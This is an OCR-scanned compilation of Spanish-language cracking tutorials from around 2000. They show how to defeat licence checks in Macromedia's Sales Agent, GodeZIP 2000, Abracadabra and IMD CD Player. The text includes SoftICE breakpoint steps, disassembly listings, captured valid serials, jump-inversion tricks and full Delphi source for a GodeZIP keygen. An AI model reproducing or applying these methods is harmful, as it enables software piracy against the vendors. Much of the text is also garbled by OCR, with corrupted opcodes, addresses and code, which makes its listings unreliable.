:10005B3B mov edi, 10028FC0 W+PERSONAL CODE y nuestro SERIAL juntos en ES:EDL 
:10005B40 83C9FF or ecx, FFFFFEFF 
:10005B43 33C0 xor eax , eax 


:10005B45 F2 repnz “Pilla SOLO el 


:10005B46 AE scasb ¿PERSONAL CODE de ES:EDI 
:10005B47 F7D1 not ecx 

:10005B49 2BPF9 sub edi, ecx 

:10005B4B 8BC1 mov eax, ecx 

:10005B4D 8BF7 mov esi, edi Y PERSONAL CODE en DS:ESI 
:10005B4F 8BFA mov edi,edx 

:10005B51 C1E902 shr ecx, 02 

:10005B54 F3 repz 

:10005B55 AS movsd 

:10005B56 8BC8 mov ecx, eax 

:10005B58 83E103 and ecx, 00000003 

:10005B5B F3 repz 

:10005B5C A4 movsb 

:10005B5D 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFEFFF70] 
:10005B63 51 push ecx 

:10005B64 8B 1594870210 mov edx, dword ptr [10028794] 
:10005B6A 81C206010000 add edx, 00000106 

:10005B70 52 push edx 

:10005B71 8D853CFFFFFF lea eax, dword ptr [ebp+FFFFFF3C] 
:10005B77 50 push eax 

:10005B78 ESD36D0000 call 1000C950=9A quí se genera el UNLOCK CODE. 
:10005B7D 83C40C add esp, 0000000C -9Con el retorno del CALL, el UNLOCK CODE en EAX 


:10005B80 33F6 xor esi, esi 
:10005B82 89B538FFFFFF mov dword ptr [ebp+FFFFFF38], esi 


:10005B88 68CC8F0210 push 10028FCC -+FASTUOSO, NUESTRO SERIAL CHUNGO. 


:10005B8D 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFEFFF70] 
:10005B93 51 push ecx 


Como podeis ver, esto es lo que hay. Lamentable desde cualquier punto de vista. Es ridículo, ¡He visto crackme's más 
complicados! 


El código mueve nuestro SERIAL a ES:EDI, lo compara con 10 (0A) y si hay diez caracteres salta, coge el PERSONAL 
CODE, lo marea un rato y nos marea a nosotros de paso, entramos en el CALL 1000C950 y aquí va transformado el 
PERSONAL CODE, mediante unas tablas compuestas exclusivamente de letras (PYUXAHLLRO .. JIKLICBXZC .. 
PQYZMERUOA .. etc.), en el UNLOCKING CODE. ¡A ver los especialistas del Keygenning! 


Una vez generado el UINLOCKING CODE lo planta en EAX y con el retorno de la llamada vemos el dichoso 
UNLOCKING CODE en nuestra ventana de datos número (0), ¡alehop!, EAX $ YFYJYJLXKH, ¡muy amable! (aquí es 
cuando tomamos nota). 


Luego siguen una seríe de rutinas de encriptación, etc, etc. Si teneis curiosidad por saber que forma tiene el 
UNLOCKING CODE encriptado, busca un pequeño archivo llamado rsagent.ini en CAWINDOWS. 


Entre otra información, verás algo parecido a esto: 


email= 

personalCode=1001565465 $ Mira lo que hay aquí. 
perkey=08$'$ST+7YGOK7L'X"M2*40H4_ Vaya pinta, ¿no? 
datalen=26 

toneDial=1 

call Wait=0 

need Access=0 

accessCode=9 

intlPrefix= 

callWaitStr= 

mailStat-391842=1 


Por cierto, el personalCode de este archivo, no se corresponde con el UNLOCKING CODE del valor de EAX de antes.;- 
) Cada vez que cambias alguno de tus datos, se genera un personalCode nuevo. 


Si en SoftICE sustituimos la instrucción PUSH 10028FCC (nuesto serial) por la dirección del UNLOKING CODE, que 
está en EAX, el programa se registra solo, ¡El SERIAL se compara consigo mismo!, ¿Que tipo de protección es está?. 


PREGUNTA... 


¿Se puede hacer un crack genérico haciendo una copia de este archivo, modificarlo con un editor hexadecimal y 
sustituir el original por el nuestro en programas con este tipo de "protección"? 


Por cierto, mientras escribía esto estaba con el FLASH 4 y me acaba de saltar el antivirus con otro de esos archivos 


raros. Este se llama z36toc3v.sys. Hala ...¡a hacer puñetas!. 


REGISTRO DEL PROGRAMA... 


Pues una vez que tienes tu UNLOCKING CODE lo pones en la casilla correspondiente, a continuación el programa 
pedirá un SERIAL NUMBER que ya tenemos apuntado gracias a nuestra investigación por el CAWINDOWSITEMP y a 
los archivos SERIALIZATION*.DLL 


En otra ventana te pedirá un CÓDIGO DE PRODUCTO que también tenemos gracias a los mismos archivos y a nuestro 
viejo y eficaz MS-DOS EDIT. 


Para más coña las ventanas de registro te ayudan, en la ventana de registro del código de producto ya pone DWW300- 
dde para que metas el código que falta, (impresentable). 


UNOS APUNTES... 


Ya tenemos los programas adecuadamente registrados, entonces pasa una cosa curiosa, aparece una ventana de 
UPDATING (con dos carpetitas y un papel volando de una a otra) y Sales Agent desaparece completamente de nuestro 
disco duro, ¡Adios!, dejando los programas totalmente desencriptados y funcionales 


Otra cosa curiosa, si desinstalas un programa que ya hayas registrado y lo vuelves a instalar de nuevo, Sales Agent no 
aparece por ningún lado. El programa está completo y se ejecuta normalmente, algo se ha quedado por el registro de 
Windows, seguro. 


PUNTO FINAL. 


Tenemos ya los programas adecuadamente registrados en nuestro ordenador. ¿Qué nos impide ir a la página de 
MACROMEDIA completar el registro y ser usuarios debidamente autorizados?. 


Nada evidentemente, tenemos todo, PERSONAL CODE, UNLOCKING CODE, NUMERO DE SERIE y CODIGO DE 
PRODUCTO. 


Vamos a dar una vuelta por MACROMEDIA ESPAÑA más que nada por la curiosidad de saber el precio de venta de 
todos estos programas. 


Aquí tienes la dirección http://www.macromedia.com/es/ 


En la tabla de abajo esta el precio de los productos "protegidos" con Sales Agent. Se pueden bajar las versiones de 
demostración del enlace PRODUCTOS. 


Por cierto, he pasado de registrarme, ¿para qué?, yo no voy a utilizar estos programas para nada, mi objetivo ERA 
Sales Agent. 


PRODUCTO PRECIO EN $ * [PRECIO EN PELAS 
COURSEBUILDER for DREAMWEAVER|  199$ + 36.000 
DREAMWEAVER 299 $ + 55.000 

| *DRUMBEAT 2000 E-COMMERCE | 59% [| 110.000 

| *DRUMBEAT 2000 JAVA SERVER | 59% [| 110.000 

o FIREWORKS3_ | 199% [| 36000 

FLASH 4 2998 | 55.000 


* El DRUMBEAT, no lo tenian ni referenciado de lo nuevo que es. He tenido que ir a yankilandia a mirar. 
* El valor del dólar está calculado según el cambio al cierre del Mercado de Divisas a 11/08/00. 


CONCLUSIONES... 


Sin comentarios... 


VAMOS A DEJARLO... 


Ah! se me olvidaba, digamos adios a Sales Agent todos juntos. ¡Bye!, ...¡Bye!... 


Dedicado al maestro... 


"...look toward east from your window, 
sip a Martini-Vodka and say three times: 
Thank you, +0RC!" 


sobre 


Karpoff Spanish Tutor: Página dedicada a la divulgación de información en Castellano, 
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Karpoff Spanish Tutor 


Programa: | GodeZIP 2000 v7.8 


PROTECCION: "Numero de Serie, Limitacion de Usos 


Descripcion: Programa de Compresion. 
Dificultad: Aficionado 


DOWNLOAD : 


http://home.worldnet.fr/dgode 


Herramientas: SICE y Algun lenguaje de Programacion 
CRACKER: RAZIiEL FECHA: 07/09/2000 


INTRODUCCION 


Hola a todos, de vuelta a las andadas, soy RAZiEL, del Grupo [K-FoR], y sólo 
deciros, que me alegra mucho el nivel de aceptación que está teniendo el grupo aún 
antes de haber salido “Oficialmente”; Espero que aprendáis un poco más hoy sobre las 
protecciones, y nada, a lo nuestro. 


1.- Saludos: 


Ten en cuenta que este tutorial está realizado únicamente con fines educativos, y que 
no puedo hacerme responsable del mal uso que se pueda hacer de la información aquí 
expuesta. Si te gusta el programa CÓMPRALO. 


| AL ATAKE 


2.- Conociendo a la Víctima: 


GodeZIP 2000 v7.8 para Windows, un programa para el tratamiento de la compresión, tanto por 
volúmenes como por archivos únicos que maneja la mayoría de los compresores que actualmente existen; 
pero queda mucho atrás de otros programas pertenecientes a su categoría, pues compresión por RAR; por 
ejemplo, no está a nuestra disposición. 


Hacemos la instalación de nuestro flamante programa y, tras ejecutarlo, aparece ventana pantalla 
como esta: 


GodeZIP Setup 


Quick | Compression | method | files | decompression associations 
— associations 


| Associate GodeZIP with files of type : 


.goz GodeZIP compressed file 


v Use Explorer shell 


.2 G2IP old compressed format Extention 

92 — GZIP compressed format 

tgz Archive TAR compressed [V 'popup' shell menu 
aj Archive ARJ 

tar Archive TAR T bitmap 


Archive TAR compressed 
ap Archive PKZIP 

.spt — GodezZIP splitted file 

Cry GodeZIP encrypted file 
.bz2  Bzip2 compressed file 
.cab MS Cabinet file 


SURE KEKEKEKGKGEK 


Cancel | About | Help 


Este programa, Cada vez que lo intentas registrar y fallas 4 veces la introducción del LICENSE 
NUMBER (LN) y el CODIGO CORRESPONDIENTE (CC) correspondiente, se cierra, y “pierdes” una oportunidad 
de uso. En este punto, os diré, que GodeZIP tiene un fallo ENORME, ya que si la primera vez que lo 
ejecutamos, en vez de darle a OK, pulsamos About e introducimos 4 veces el LN y el CR de manera 
incorrecta, no “pierdes” oportunidades de uso, puesto que empieza a contar el número de usos cuando 
está completamente configurado. 


3.- Toma de Contacto: 
Bien; pulsamos About y “Enter my code” e introducimos, por ejemplo: 


License Number (LN): 12345678912345 
Corresponding Code (CC): 987654321312 


Y... nada, ventanazo; BAD LN; BAD CC; RETRY... Bien... pues a CRACKEARLO!!!, pero antes; echemos 
un vistazo con File Analizer para ver si está empaquetado... y... no lo está (mejor, así nos 
ahorramos trabajo). 


Comentario Sabroso: La longitud mínima del Serial de dicho programa son 15 Dígitos (pues realiza 15 
comprobaciones distintas con los diversos números introducidos); no creáis que he introducido tantos 
dígitos por casualidad. 


Cargamos SICE y al lío... 
4.- Destripando... 


Entramos de nuevo en el programa; y sin pulsar OK (Para evitar que la barrita de usos suba), 
pulsamos About; y tras meter el LN y CC; pulsamos CTRL + D para ir a SICE y ponemos los clásicos BPX 
GETDLGITEMTEXTA, SHOWWINDOW... Pulsamos OK y el que pica es GETDLG... 


Bien, hemos caido dentro de USER32; No nos interesa, por lo que pulsamos F12; Ahora dentro de 
GODEZIP, pero hay una llamada a la API tres líneas más abajo, tampoco interesa... por lo que pulsamos 
de nuevo F12 y aparecemos aquí: 


004034E1 call 402934 > Vamos Traceando con F10 para evitar meternos de subrutinas, 
seguimos y... 

004034E6 mov 44F696, ax 

004034EC push 1 

004034EE push 44F210 > Nuestro LN 

004034F3 push 44F223 > Nuestro CC 

004034F8 call 402B84 


Vaya, Vaya, GodeZIP pone en esas dos direcciones de memoria nuestro LN y CC; Y llama a una 
función... Sospechoso, ¿Verdad?; ¿Porqué no nos metemos en esa función con F8?; Bien, ya estamos 
dentro, seguimos Traceando y llegamos aquí... 


No sin saber anteriormente que en EBX está nuestro CC... 


00402BEA cmp byte ptr [ebx], 44h > Compara el primer dígito de nuestro CC con un 44h (“D”) 
00402BE setz al > Introduce “1” si son iguales 

00402BF0O movzx edx, al > Pasa a edx el valor de al 

00402BF3 mov ecx, [ebp+04] > Introduce en ECX, [EBP+04] en adelante; que “casualmente” es 
nuestro LN 

00402BF6 cmp byte ptr [ecx], 47h > Compara el primer dígito de nuestro LN con un 47h (“G”) 
00402BF9 setz al > Introduce “1” si son iguales 

00402BFC and eax, OFFh .. Modifica el Flag “Z” Según eax 

00402C01. test eax, edx > Testa eax y edx 

00402C03 jz 402DE0 > Si son iguales; sigue con la comprobación, en otro caso: BAD LN... 


Llegados a este punto; tenemos que claramente; El inicio de nuestro CC ha de ser una “D” y el 
inicio de nuestro LN una “G”; en caso contrario saltará el programa y no podremos seguir con la 
comprobación... Seguimos con la siguiente.. 


00402C09 call 402B3C 

00402C0E test eax, eax 

00402C10 jnz 402DE0 

00402C16 movsx edx, byte ptr [ebx+06] > Coge el séptimo carácter del CC y lo introduce en 
EDX 

00402C1A mov ecx, [ebp+04] > Introduce en ECX, [EBP+04] en adelante ( nuestro LN ) 
00402C1D movsx eax, byte ptr [ecx+01] > Coge el Segundo carácter del LN y lo introduce en 


EAX 
00402C21 add eax, 1Eh > suma al carácter de LN 1Eh (“30”) 
00402C24 cmp edx, eax > Compara el resultado con el carácter cogido anteriormente de 
nuestro CC 
00402C26 jnz 402DE0 > En caso de que ambos caracteres sean distintos; salta a BAD LN... 


en otro caso sigue... 
Ya sabemos que nuestro séptimo carácter del CC tiene que ser el segundo del LN + 30d... 


Perfecto; llegados a este punto puedo dejar de explicar el código; ya que las estructuras 
siguientes son idénticas a la anterior, pero cogiendo otros caracteres de LN y CC y sumando una 
cantidad distinta; no obstante adjunto lo que hace: 


Tercera comprobación... 


00402C39 movsx edx, byte ptr [ebx+05] > Coge el sexto carácter del CC 
00402C40 movsx eax, byte ptr [ecx+02] > Coge el tercer carácter del LN 
00402C44 add eax, 17h > Suma (“23”) En decimal... 


Cuarta... 


00402C5C movsx edx, byte ptr [ebx+02] > Coge el tercer carácter del CC 
00402C63 movsx eax, byte ptr [ecx+03] > Coge el cuarto carácter del LN 
00402C67 add eax, 1Fh > Suma (“31”) En decimal... 


Quinta... 


00402C7F movsx edx, byte ptr [ebx+07] > Coge el octavo carácter del CC 
00402C86 movsx eax, byte ptr [ecx+04] > Coge el quinto carácter del LN 
00402C8A add eax, 11h > Suma (“17”) En decimal... 


SEXTA... 


00402CA2 movsx edx, byte ptr [ebx+03] > Coge el cuarto carácter del CC 
00402CA9 movsx eax, byte ptr [ecx+05] > Coge el sexto carácter del LN 
00402CAD add eax, 13h > Suma (“19"“) En decimal... 


Séptima... 


00402CC5 movsx edx, byte ptr [ebx+01] > Coge el segundo carácter del CC 
00402Ccc movsx eax, byte ptr [ecx+06] > Coge el séptimo carácter del LN 
00402CD0O add eax, 15h > Suma (“21"“) En decimal... 


Octava... 


00402CE8 movsx edx, byte ptr [ebx+04] > Coge el quinto carácter del CC 
00402CE mOvsx eax, byte ptr [ecx+07] > Coge el octavo carácter del LN 
00402CF3 add eax, 1Dh > Suma (“29“) En decimal... 


Novena... 


00402D0B movsx edx, byte ptr [ebx+08] > Coge el noveno carácter del CC 
00402D12 mOvsx eax, byte ptr [ecx+08] > Coge el noveno carácter del LN 
00402D16 add eax, 1Eh > Suma (“30“) En decimal... 


Décima... 


00402D2E movsx edx, byte ptr [ebx+09] > Coge el décimo carácter del CC 
00402D35 movsx eax, byte ptr [ecx+0D] > Coge el décimo cuarto carácter del LN 
00402D39 add eax, 1Ch > Suma (“28"“) En decimal... 


Décimo Primera... 


00402D51 movsx edx, byte ptr [ebx+0A] > Coge el decímo primer carácter del CC 
00402D58 mOvsx eax, byte ptr [ecx+0E] > Coge el décimo quinto carácter del LN 
00402D5C add eax, 18h > Suma (“24“) En decimal... 


Décimo Segunda... 


00402D6C movsx edx, byte ptr [ebx+0B] > Coge el décimo segundo carácter del CC 
00402D73 mMOVSX €eax, byte ptr [ecx+0B] > Coge el décimo segundo carácter del LN 
00402D77 add eax, 15h > Suma (“21"“) En decimal... 

Décimo Tercera... 


00402D87 movsx edx, byte ptr [ebx+0C] > Coge el décimo tercer carácter del CC 
00402D8E movsx eax, byte ptr [ecx+0C] > Coge el décimo tercer carácter del LN 
00402D92 add eax, 16h > Suma (“22"“) En decimal... 


Décimo Cuarta... 


00402DA2 movsx edx, byte ptr [ebx+0D] > Coge el décimo cuarto carácter del CC 
00402DA9 movsx eax, byte ptr [ecx+0A] > Coge el décimo primer carácter del LN 
00402DAD add eax, 1Bh > Suma ("27") En decimal... 


Última comprobación... 


00402DBD movsx edx, byte ptr [ebx+0E] > Coge el décimo quinto carácter del CC 
00402DC4 movsx eax, byte ptr [ecx+09] > Coge el décimo carácter del LN 
00402DC8 add eax, 1Dh > Suma (“29"“) En decimal... 


Bien! En el caso de haber pasado todas las comprobaciones de manera “legal” (también puedes 
trucar los saltos); te aparecerá la ansiada ventana: 


Godezip message 


AN Thank for your contribution 


Y nuestro CC habrá quedado transformado en: DKRHTIOEVPMGILV 
5.- Creando un KeyGen: 


Creo que está suficientemente claro lo que hace la rutina de comprobación en cada Caso... así 
que ya podemos crear nuestro KeyGen; Para ello has de tener mínimos conocimientos de programación en 
cualquier lenguaje; yo por ejemplo he escogido Delphi 3.0; aunque se puede hacer en cualquier otro... 


Adjunto mi código en Delphi poco depurado, ya que se podría hacer con Arrays y no de forma tan 
loca; pero, como acabo de empezar a programar en Delphi y todavía no tengo demasiado dominio y, 
además, para que se entienda mejor, lo he dejado así. 


También dejar claro, que puesto que todos los LN y CC comienzan por G y D Respectivamente eso lo 
añadiremos al Final... para poder implementar dicho código será necesario crear un proyecto con los 
siguientes controles y nombres: 


Licencia Button1 [Opcional] 


= GodeZIP KeyGen [K-FoR[] 2000 Tal ES 


Codigo Button2 (Dpcional) 


Procedure TForml.Button1Click (Sender: TObject); 


VAR // Declaración de Variables // 

Licensecode, Serialcode: String; 

P1,P2,P3,P4,P5,P6,P7,P8,P9,P10,P11,P12,P13,P14: Integer; // Todas las Posiciones del LN // 
S1,S2,S3,854,S5,56,S7,S8,5S9,510,S11,S12,S13,S14: String; // Todas las posiciones del CC // 


BEGIN //Inicio del Código// 
Licensecode:= Licencia.Text; // Asigna a la variable de Licensecode lo que hay en la 
casilla de Licencia // 


If strLen(pchar (Licensecode)) = 0 Then // Si la longitud de Licensecode =0; es decir, no 
se ha introducido nada... // 
begin 
Showmessage ('Por favor rellena la casilla de licencia'); // Muestra este mensaje // 
exit; 
end; 


If strLen (pchar (Licensecode)) < 14 Then // Si hay menos caracteres de los que usa para 
comprobar... // 


begin 
Showmessage ('Has de Poner los 14 Caracteres'); // Muestra este mensaje // 
exit; 
end; 
P1 := Ord(licensecode[1]); // Asigna el valor Ascii de la posición [x] del LN a un P[x] // 
P1 := P1+30; // Suma “x” en Ascii // 
S6:= Chr(P1); // Convierte el resultado a Carácter y lo asigna a una posición [x] 
determinada del CC // 
P2 := Ord(licensecodel[2]); 
P2 := P2+23; // Repite lo mismo pero con otro valor... // 
S5:= Chr(P2);5 
P3 := Ord(licensecode[3]); 
P3 := P3+31; // Igual... // 
S2:= Chr (P3); 
P4 := Ord(licensecode[4]); 
P4 := P44+17; // Igual... // 
S7:= Chr (P4); 
P5 := Ord(licensecode[5]1); 
P5 := P5+19; // Igual... // 
S3:= Chr(P5); 
P6 := Ord(licensecode[6]); 
P6 :=P6+21; // Igual... // 
S1:= Chr(P6); 
P7 := Ord(licensecode[7]); 
P7 :=P74+29; // Igual... // 
S4:= Chr (P7); 
P8 := Ord(licensecode[8]); 
P8 :=P8+30; // Igual.. // 
s8:= Chr (P8); 
P9 := Ord(licensecode[9]); 


P9 :=P9+29; // Igual... // 
S14:= Chr(P9); 


P10 := Ord(licensecode[10]); 
P10 :=P10+27; // Igual... // 
S13:= Chr(P10); 

P11 := Ord(licensecode[11]); 
p11 :=P11+21; // Igual... // 
sil:= Chr(P11)5 

P12 := Ord(licensecode[12]); 
P12 :=P12+22; // Igual... // 
s12:= Chr(P12); 

P13 := Ord(licensecode[13]); 
P13 :=P13+28; // Igual... // 


Ss9:= Chr(P13); 


4 := Ord(licensecode[14]); 
P14 :=P14+24; // Igual... // 
0:= Chr (P14); 


Codigo.text:= 'D'+S1+52+53+54+55+86+87+88+589+810+511+S12+S13+S14; //Muestra el CC 
añadiendole “D” al inicio // 

Licencia.Text:='G' + Licensecode; // Al LN le añadimos la “G” Al principio // 

END; 


6.- Finalizando... 


Creo que eso es todo; Lo compiláis y listo; pero si probais con letras puede que dicho algoritmo 
no funcione tal y como debería; por lo que implementamos algo en la caja de texto de Licencia: 


Procedure TForml.LicenciaChange (Sender: TObject); 


begin 


If licencia.Text = '' then exit; 
If (ord(licencia.text [strlen (pchar (licencia.text))]) < 48) or E 
(ord (licencia.text [strlen (pchar (licencia.text))]) > 57) then 


begin 
showmessage ('Sólo Números'); 
licencia.Clear; 
exit; 

end; 


Así hacemos que no se puedan introducir letras en dicha caja, con lo cual nos quitamos de 
problemas ¿Porqué 48 y 577; pues mira una tabla ASCII y lo comprenderás... 
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Programa: Abracadabra 1.2.6 


Karpoff Spanish Tutor 


PROTECCION: Name / Serial 

Descripcion: Explorador para el windows 

Dificultad: Principiante 

DOWNLOAD : www.lighttek.com 

Herramientas: Softice 

CRACKER: Riverwind | FECHA: 07/09/2000 


| INTRODUCCION 


Bueno este es mi primer tutorial y espero que os sirva para algo,mi nivel es algo basico ya que solo llevo un 
par de meses,las razones que me llevaron hacer este tuto es compartir la informacion y por que asi puedo 
aprender mucho mas. 


Con este programa puedes ver casi cualquier archivo.El programa abre muchos tipos de texto y archivos de 
gráficos.También puedes navegar a través de los directorios. 


Este documente es solo con fines educativos y en cualquier caso el autor se hace responsable del mal uso de 
el. 


| AL ATAKE 


Lo que vamos hacer es capturar un serial valido,abrimos el simbol loader.clik sobre File y despues Open.....bien,ahora 
le damos a los engranejes y nos aparecera una ventanita,la aceptas y entraras en softice,pulsa Ctrl+D y el programilla 
seguira ejecutandose como si nada,nos vamos al about y pulsamos sobre Registration,ponemos el name y el serial que 
querais,en mi caso usare Riverwind y de serial 123456,le damos al Ok y como era de esperar nos dice que no vale pa 
na :( bueno,bueno,no desespereis, aceptamos la ventanita y antes de pulsar Ok nos meteremos en el softice con Ctrl+D 
para poner un breakpoint,nosotros utilizaremos este, teclear bpx hmemcpy y luego enter,ahora tendremos que salir del 
softice asi que Ctrl+D y estaremos fuera del softice,ahora tendreis que pulsar sobre Ok con nuestros datos si lo habeis 
hecho bien estaremos de nuevo en el softice,ahora tendremos que localizar la rutina que comprueva nuestro serial falso 
con el auntentico. 


Asta aquí bien no?,bueno pues ahora lo que tenemos que hacer es quitar el breakpoint para ello utilizaremos el 
comando bc* y luego enter con esto lo que hareis sera borrar todos los breakpoint que pudierais haber puesto.Como lo 
que queremos es capturar un serial valido pulsaremos F11,ya que de lo contrario le seguiremos la pista al name,ahora 
ya estamos por el buen camino,bien,ahora observar que pone algo asi como USER<01>en color verde,esto significa 


que estamos fuera del abracadabra,asi lo que tenemos que hacer es pulsar F12 asta llegar a el tendreis que pulsar F12 
unas 6 veces,cuando la hallais localizado lo que tendremos que hacer sera tracear el programa asta localizar esto 


0046e76d call 004029fc 

0046e772 imul eax,000007b2 

9946e778 mov esi,eax 

0046e77a cmp esi,(ebp-04)------------ >lleva nuestro serial 


Si habeis llegado hasta aqui felicitaros por que ya teneis vuestro serial,para saber cual es teneis que llegar con £10 hasta 
0046e77a y despues teclear lo siguiente d esi y pulsar enter y en la pantalla de datos tendreis vuestro ansiado 
serial,para que no os perdais os tiene que salir algo parecido a esto.... 


001cad54 0001879380 "L1T" 


Sabeis ya el serial?solo teneis que quitar los ceros y ya tendreis un serial valido,siempre y cuando hallais utilizado mi 
name.Bueno espero que lo hallais entendido,he tratado de explicarme lo mejor que he podido. 
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Karpoff Spanish Tutor 


Prog rama IMD CD PLAYER 1.01 e INFOTEL 3.10 


Serial 
PROTECCION: 
. ] Reproductor de CD's 
Descripcion: 

Facilucha 
Dificultad: 

http: //www.ctv.es/USERS/imedia 
DOWNLOAD: (q 0 KK 0 0EO O OQCQ—Q— o 


Softice, W32dasm 


errmentas 


e 2 
RE Yerba Mate ino 16/09/2000 


INTRODUCCION | 


Bienvenidos al tercer tutorial. Espero que el segundo haya quedado claro y que hayas obtenido los seriales 
para ' Visual Business Card ' y ' Visual Labels '. En este conseguiremos la clave para Imd cd player 1.01 
con Soft-Ice no sin antes analizarlo con WD32DSM89. Se podría conseguir la clave más fácil y rapidamente 


trabajando solo con Soft-Ice, pero lo que buscamos es aprender. El listado que nos da WD32DSM nos 


permite practicar la lectura de asembler . Las horas que pasemos aprendiendo asembler seran días ahorrados 
a la hora de crackear. 


AL ATAKE 


Corremos el programa vamos a ' help ' ' register' e ingresamos nuestros datos (no hace falta decir que pongas los tuyos ) En mi caso esto es 
lo que puse: 


CDP Registro 
CDP puede ser utilizado durante 30 dias de forma gratuita. 
El uso continuado pasado ese tiempo requiere registrarse. 
CDP no dará aviso cuando el periodo de prueba haya 
concluido, será responsabilidad del usuario registrarse. 
Puede registrarse y conseguir su copia de CDP completa, 
recibiendo por correo electrónico su número de serie, 


de dos formas distintas: 


- Ingresando la cantidad de 1.000 ptas. (o 8$ US) en el 


Número de Serie: (E 


Registrarse 


Le deamos a registrarse y como era lógico nos dice que no es válido. Desensamblamos nuestra vítima con el WD32DSM le damos al botón 


boto 
-_| y buscamos nuestro mensaje de error 


"ImmSetCompositionFontá,” 
"ImmSetCompositiorlindow" 
"ImmSetConversionStatus” 
"ImmSetOpenStatus” 
"InitializeFlatSB" 

A: “Invalid Register.” 
"IsControl” 


"kemel32. dll" 
pl 


"Lista de Pistas" 
U 'm Y d Pp 1 
"Magellan MSWHEEL" 


Doble click en la referencia y nos lleva directamente a lo que vemos 


Ele dc Ra AI 1816015 15 E 5 0 EE FRE 


-O045A4A9(C), :OOASAGSC(C) 


Inmediatamente sobre ' invalid register ' vemos una comparación seguida de un jne pero a no confundirse que eso no nos sirve. Que como lo 
se? Fijate a donde salta (0045A568 ) ' registro inválido '. Lo único que hace es seleccionar el idioma. Bueno y entonces que hacemos. 
Más arriba tenemos Referenced by (U)nconditional or (C)onditional jump at adresses: 00454449 ,0045A45C . Vamos a ver que 
encontramos en esas posiciones . 


:0045440D SD5S5FS lea edx, dword ptr [ebp-08] a] 
200454410 24138594700 mov eax, dword ptr [00475938] 
:004524415 SBS0E0020000 mov eax, dword ptr [eax+000002E0] 
:00452441B ESl14F1FCFF call 00429534 

:00454420 SB45F8 mov eax, dword ptr [ebp-08] 
00454423 SDS55FC lea edx, dword ptr [ebp-04] 
:00454426 ES356F0000 call 00461360 

:00452442B S8DS5F8S lea edx, dword ptr [ebp-08] 
:0045442E A138594700 mov eax, dword ptr [00475938] 
200454433 SBS0E4020000 mov eax, dword ptr [eax+000002E4] 
:00454439 ESF6FOFCEF call 00429534 

:00451443E SBS55F3 mov edx, dword ptr [ebp-08] 
:00454441 SB45FC mov eax, dword ptr [ebp-04] 
00454444 ES1I7T99FAFF call 00403D60 

:D0045244F SB45FC mov eax, dword ptr [ebp-04] 


* Possible StringData Ref from Code 0b3 


=>"111111111111111" 


004524452 BA24454500 mov edx, 00454524 
:00454457 ESO499FAFF call 00403D60 

0 -0045445C 0OFS4FO000000 je 004524552 
:00454462 A1383D4700 mov eax, dword ptr [00473D38] 
:004524467 Cóo000 mov byte ptr [eax], 00 
:00454464 1160404700 mov eax, dword ptr [0047406C] 
:0045446F 8B00 mov eax, dword ptr [eax] 
2004514471 SBS0OFOOZ20000 mov eax, dword ptr [eax+000002FO] 
2004524477 33D2Z xor edx, edx 
200454479 ESAGEFFCFF call 00429424 SS 
:0045447E A16C0404700 mov eax, dword ptr [0047406C] 
:004514483 SBDO mov eax, dword ptr [eax] 
:D00452485 8BE80F4020000 mov eax, dword ptr [eax+000002F4] 
:00452448B 33D2 xor edx, edx 
:0045448D ES92EFFCFF call 00429424 
004524492 SDSS5FS lea edx, dword ptr [ebp-08] 


4 TE 


a 


- o A 


cede 


Ma a 


AS SS au 
:004514483 SBOO mov 
004514485 8B30F4020000 moy 
:0045448B 33D2 xor 


Lar, 
eax, 
eax, 
edx, 


OUWota pi 
dword ptr 
dword ptr 
edx 


:0045448D ES92EFFCFF call 00429424 
:004514492 SD5S5FS lea edx, dword ptr 


TE a id - oo 


Me dt 


10020550] 
[eax] 
[eax+000002F4] 


[ebp-08] > 
CANA AMAIA 
> 


W32Dasm List ... EJlal E lesds Data (2:00454449 GOffset 00059849h in File:Cdp.exe 


Vemos sobre la 0045A449 se carga un valor en edx otro en eax luego un call 00403D60 (seguramente la rutina de comprobación) 
finalmente nuestro ¡ne 00454552 ( salto a invalid register ). Sobre 0045A45C tambien hay un call 00403d60 . Sin mas demoras pasamos al 


Simbol loader del soft-ice . Abrimos el CDP.exe y le damos al ex y ponemos un bpx0045A444 (si te fijas en el listado anterior veras que se 
detendrá justo despues de haber pasado los valores a los registros ) y nos fijaremos que hay en edx y en eax . Si haces esto verás que en edx 
esta el número ingresado por nosotros y en el eax vemos ' XFPSII111111111' el serial correcto para yerba mate como nombre de usuario . 


EAEREAERERRE RARA RRE RA RAR RRA RRA RAR A KAR 


NOTA: te acordas que nos pasó en el tutorial anterior cuando intentamos patchearlo, en este nos volvería a pasar Si en el WD32DSM 


pulsamos [Ex veríamos lo siguiente : 


432Dasm Alphabetical List of Imported Functions 


To Search Disassembly for Function, Double Click on Text 


advapi32.RegClosekey 
advapi32.RegCloseKey 
advapi32.RegCreateKeyExó, 
advapi32.RegFlushKey 
advapi32.RegOpenkKeyE xá, 
advapi32.RegOpenKeyEx4, 
advapi32.RegQueryWalueE xó, 
advapi32.RegQueryWalueE xó, 
advapi32. RegSetvalueE xó, 
comctl32.ImageList_4dd 
comctl32.ImageList_BeginDrag 
comctl32.ImageList_Create 
comctl32.ImageList_Destroy 
comctl32.ImageList_DragEnter 
comctl32.ImageList_DragLeave 
comctl32.ImageList_DragMove 
comctl32.ImageList DragShowNolock 


z 
Copy All Copy View | 


Fijate en las siguientes funciones RegCreateKeyExA , RegOpenKeyExA , RegOpenQuerryValueExa ; si patcheáramos el salto condicional 
nos diría que el número es correcto pero al correrlo otra vez volveríamos a estar no registrados. Esto es debido a que cuando nos acepta el 
serial ,guarda en el registro del sistema el nombre y el número de serie (falso) y cuando lo volvemos a correr comprueba que no son correctos 
. Si ejecutas el REGEDIT veras en HKEY_CURRENT USER/Software/CDP/CDPRegister lo que te estoy diciendo. Para hacer esta prueba 
sin patchear cuando estes en el soft-ice en la posición 00454449 ¡ne 0045a552 tipea r fl z e invertirás el salto luego pulsas ' F5 '. 


£* Editor del Registro 
Registro Edición Wer Ayuda 


5-43 CDP -IMD CD Player 
(EY CDP Info 
(3 CDP Options pa 
(3 CDP Preferences 
¿3 CDP Register 
(29 CDP State 
(3 Cerious Software Inc. 
Y Cíb 
a 


Mi PCAHKEY_CURRENT_USERiSoftwareiCDP - IMD CD PlayerxCDP Register Lo 


[valor no establecido) 
2FP511111111111" 
"verba mate" 


HAHAHA AAA AAA 


Tranquilo!!! todavía no lo registres. Si no aguantaste más y ya lo registraste, corre el regedit busca la rama que recién mencionamos y 
